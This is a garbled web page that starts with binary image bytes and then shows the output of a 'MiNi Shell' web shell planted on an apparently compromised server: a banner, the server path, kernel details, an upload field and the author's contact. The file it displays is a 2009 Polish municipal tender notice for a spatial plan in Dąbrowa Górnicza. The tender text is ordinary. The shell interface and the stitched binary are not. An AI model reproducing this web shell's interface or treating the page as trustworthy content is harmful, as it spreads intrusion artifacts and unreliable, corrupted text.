JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/156256-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Sporządzenie miejscowych planów zagospodarowania przestrzennego 
miasta Dąbrowa Górnicza:Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla rurociągu tlenu z huty ArcelorMittal do huty CMC Zawiercie.</b><br>
<b>Numer ogłoszenia: 156256 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie miejscowych planów zagospodarowania przestrzennego 
miasta Dąbrowa Górnicza:Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla rurociągu tlenu z huty ArcelorMittal do huty CMC Zawiercie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Postępowanie o udzielenie zamówienia prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwot określonych w przepisach wydanych na podstawie art. 11 pkt. 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.).
2. Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla rurociągu tlenu z huty ArcelorMittal do huty CMC Zawiercie. -zgodnie z uchwałą inicjującą nr XXXVIII/656/09 Rady Miejskiej w Dąbrowie Górniczej z dnia 17 kwietnia 2009 roku.
Skala 1:2000.Powierzchnia obszaru objętego planem wynosi ~ 36,0 ha.
3.Dokumentacja planistyczna składać się będzie z:
A .Diagnozy stanu istniejącego wraz z koncepcją rozwiązań planu - 2 egz.
B. Opracowania ekofizjograficzne w skali 1: 2000 - 2 egz.
C. Prognozy oddziaływania  na środowisko w skali 1: 2000 - 4 egz.
D. Prognozy skutków finansowych uchwalonego planu - 4 egz
E. Ustaleń planu i rysunku planu w skali 1: 2000 w formie projektu Uchwały Rady Miejskiej - 6 egz.
F. Dokumentacji formalno-prawnej - 2 egz.
G. Wniosku o uzyskanie zgody na przeznaczenie gruntów   leśnych na cele nieleśne zgodnie z ustawą 
z dnia 03.02.1994r. o ochronie gruntów rolnych i leśnych, o ile z koncepcji zagospodarowania wyniknie konieczność jego sporządzenia -6 egz.
4.Dokumentacja planistyczna winna być opracowana zgodnie z ustawą o planowaniu i zagospodarowaniu przestrzennym (Dz.U. z 2003 r. nr 80 poz. 717 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury w sprawie wymaganego zakresu projektu planu miejscowego (Dz. U. z 2003r. Nr 164 poz. 1587).
5. Wszystkie elementy dokumentacji planistycznej winny być sporządzone w formie papierowej w ilościach egzemplarzy wymienionych powyżej oraz w formie elektronicznej na nośniku cyfrowym.
6. Rysunki planów w skali 1:2000 winny być wykonane na podkładzie sytuacyjno-  wysokościowym z oznaczeniem własności, w formie papierowej, w tym 1 z kompletów należy wykonać na twardym podkładzie oraz w formie elektronicznej na nośniku cyfrowym w formacie JPG oraz w programie jakim dysponuje Gmina tj.  MAPINFO.
7. Wykonawca będzie zobowiązany do obsługi formalno - prawnej oraz kancelaryjnej związanej z tokiem prac przy wykonaniu zadań, o których mowa wyżej oraz do przygotowania odpowiedniej ilości projektów do uzgadniania i opiniowania.
8. Wykonawca będzie zobowiązany do oddania przedmiotu zamówienia na zaktualizowanym podkładzie mapowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawcy ubiegający się o udzielenie zamówienia są zobowiązani wnieść wadium zgodnie z art. 45 ust.1 ustawy Pzp w wysokości 1 200,00 zł w formach określonych w art. 45 ust. 6  ustawy Pzp.
2.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego:Getin Bank S.A. 74 1560  1010  0000  9480  0001  1847
3. Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną przez Wykonawcę. 
4.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć w Wydziale Księgowo-Budżetowym Urzędu Miejskiego w Dąbrowie Górniczej ul. Graniczna 21,III piętro, pokój nr 320. Natomiast do oferty należy dołączyć kserokopię złożonego dokumentu, potwierdzoną za zgodność 
z oryginałem przez Wykonawcę.
5. Zwrot wadium  - zgodnie z art. 46 ust.1 ustawy Pzp.
6.  Zatrzymanie wadium- zgodnie z art. 46 ust. 5 oraz art. 46 ust. 4 a ustawy Pzp. 
7.  Termin wniesienia wadium -  przed upływem terminu składania ofert.
8. Wykonawcy, którzy nie wniosą wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzą się na przedłużenie okresu związania ofertą zostaną wykluczeni z postępowania (art. 24 ust. 2  pkt 4  ustawy Pzp).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia określonego w części I niniejszej specyfikacji mogą ubiegać się wykonawcy, którzy:
1.Spełniają wymagania określone w art. 22 ust.1 ustawy Pzp i nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy Pzp,
2.Nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne i zdrowotne z wyjątkiem przypadków, gdy uzyskali oni przewidzianą prawem zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3.W okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali , a  w przypadku usług okresowych lub ciągłych są również w trakcie wykonywania, co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, której należyte wykonanie zostało potwierdzone. Przez usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia należy rozumieć wykonanie miejscowego planu zagospodarowania przestrzennego o wartości min. 40 tys. brutto zł, który został opublikowany w Dzienniku Urzędowym,
4.Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia tj.:
a)głównym projektantem, który winien przynależeć do Izby Urbanistycznej,
5.pozostałymi osobami posiadającymi uprawnienia lub kwalifikacje w każdym z wymaganych do sporządzenia planu zakresów,  zgodnie z wymogami ustaw i rozporządzeń tj. prognozy oddziaływania na środowisko, prognozy skutków finansowych uchwalenia planów oraz ekofizjografa - minimum jedna osoba z każdej branży, przy czym dopuszczalne jest posiadanie więcej niż jednego  uprawnienia lub kwalifikacji przez jedną osobę,
6.Oświadczą, że wykonają rysunek planu metodą cyfrową  i dysponują sprzętem lub legalnym oprogramowaniem, które będzie służyć realizacji zamówienia lub przedłożą pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych narzędzi i urządzeń,
7.Przedstawią dokumentację 1 miejscowego planu zagospodarowania przestrzennego dla miasta liczącego powyżej 100 tys. mieszkańców i powierzchni powyżej 100 km2,
8.Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności,                    
9.Wniosą wadium na warunkach określonych w pkt. 13 SIWZ 
Uwaga!
Stwierdzenie spełniania warunków - udziału w postępowaniu (formalnych) i zdolności do wykonania zamówienia (merytorycznych)- wymaganych od Wykonawców będzie dokonane w oparciu o złożone wraz 
z ofertą: oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego oraz potwierdzające spełnienie tych warunków dokumenty- według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.Oświadczenie, że Wykonawca spełnia wymagania określone w art. 22 ust. 1 ustawy Pzp i nie podlega wykluczeniu z postępowania na podst. art. 24 ust. 1 i 2 ustawy Pzp - (wzór oświadczenia - Załącznik nr 2 do SIWZ) - wskazana data podpisania oświadczenia.
3.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, potwierdzający spełnianie warunku określonego w pkt. 10.4. SIWZ - (wzór wykazu - Załącznik nr 3 do SIWZ) - wskazana data podpisania wykazu.Wymagane załączenie kserokopii uprawnień i zaświadczeń przynależności do właściwej dla danej specjalności Izby Samorządu Zawodowego, określonych w pkt. 10.4. SIWZ. 
4.1. W przypadku przedstawienia w wykazie osób, którymi Wykonawca będzie dysponował za zgodą innych podmiotów wymagane jest przedłożenie pisemnego zobowiązania tych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia (wzór oświadczenia -Załącznik nr 4 do SIWZ)  - wskazana data podpisania oświadczenia.
5.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy 
w tym okresie, odpowiadających swoim rodzajem  i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania oraz odbiorców potwierdzających spełnianie warunku określonego w pkt. 10.3. SIWZ, (wzór wykazu - Załącznik nr 5 do SIWZ) - wskazana data podpisania wykazu.
6.Dokumenty potwierdzające, że usługi, o których mowa w  pkt. 10.3 SIWZ zostały wykonane należycie, min. 1 np. referencja wystawiona przez poprzednich zamawiających/inwestorów o wartości min. 40 000,00 zł bruto.
7.Oświadczenie Wykonawcy o wykonaniu rysunku planu metodą cyfrową oraz, że Wykonawca dysponuje lub będzie dysponował  odpowiednim sprzętem i legalnym oprogramowaniem, niezbędnych do wykonania zamówienia - według wzoru Zamawiającego stanowiącego Załącznik nr 6 do SIWZ - wskazana aktualna data podpisania oświadczenia.
7.1. W przypadku przedstawienia w oświadczeniu, o którym mowa w pkt. 11.7 narzędzi i urządzeń niezbędnych do wykonania zamówienia , którymi Wykonawca będzie  dysponował za zgodą innych podmiotów  wymagane  jest przedłożenie pisemnego zobowiązania tych podmiotów do ich udostępnienia (wzór oświadczenia -Załącznik nr 7 do SIWZ) -wskazana data podpisania.
8. Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Ponadto do oferty należy załączyć:
10.Formularz ofertowy - wykonany według wzoru Zamawiającego stanowiącego Załącznik nr 1 - wskazana aktualna data podpisania oferty.
11.Kserokopie potwierdzenia wniesienia wadium na warunkach określonych w pkt. 13 SIWZ.      
12.Opis metodyki sporządzenia miejscowego planu zagospodarowania przestrzennego, zgodnie z pkt. 10. 7 siwz.Metodyka sporządzenia miejscowego planu zagospodarowania przestrzennego winna zawierać następujące elementy:
a) dokumentację planistyczną miejscowego planu zagospodarowania zgodnie z nową ustawą o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity Dz.U.z 2003r.,Nr 80 poz.717 z dnia 27 marca 2003 oraz Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003roku (Dz.U. z 2003r Nr 164 z 19 września 2003 roku),
b) harmonogram terminowo - rzeczowo - finansowy,
c) metodę  opracowania wyceny wraz z uzasadnieniem. 
13.Pełnomocnictwo do reprezentowania:
a) wymagane w  przypadku gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których uprawnienie do reprezentacji nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza.
b) wymagane w przypadku Wykonawców wspólnie ubiegających się o zamówienie (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza.
Uwagi: 
1. Złożone dokumenty winny być zgodne z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U.  z 2006r. , Nr 87 poz. 605 z późn. zm.).
2. Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną /dotyczącą składania nieprawdziwych zeznań i oświadczeń/ wynikającą z art. 297 Kodeksu Karnego. W razie stwierdzenia, że złożone przez wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 k.p.k. - zawiadomi o tym fakcie właściwy organ ścigania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Termin wykonania - 10</li>
<li>3 - Ocena jakości opracowania - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Urbanistyki i Architektury, pokój nr 218 piętro II.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 09:00, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Urbanistyki i Architektury, pokój nr 218 piętro II.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 10 niniejszej SIWZ. W przypadku wymogów dot. potencjału sprzętowego, ekonomicznego i kadrowego, a także doświadczenia realizacyjnego wystarczające jest łącznie ich spełnienie przez wszystkich wykonawców  składających wspólną ofertę.
12.2.Dokument wymagany w pkt. 11.1., 11.3. i 11.8. SIWZ  wykonawcy składają odrębnie, przy czym w przypadku polisy Zamawiający dopuszcza złożenie jednej polisy wystawionej na Wykonawców występujących wspólnie. Dokumenty i oświadczenia wymienione w  pkt. 11.4.- 11.7.1. SIWZ składa  co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenie wymienione w pkt.11.2 SIWZ winno zostać podpisane wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Formularz ofertowy (pkt. 11.9 SIWZ) i Opis metodyki sporządzenia miejscowego planu zagospodarowania przestrzennego (pkt. 11.11 SIWZ) winny zostać podpisane przez uprawnionych przedstawicieli Wykonawców.
12.3.Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia 
publicznego. Preferowane jest, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo winno zostać dołączone do oferty. 12.4.Pełnomocnictwo winno być złożone w formie oryginałów lub kopii poświadczonej przez notariusza. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
12.5.Wykonawcy ubiegający się wspólnie o udzielenie zamówienia będą odpowiedzialni solidarnie za wypełnienie zobowiązań umownych.

Creat By MiNi SheLL
Email: jattceo@gmail.com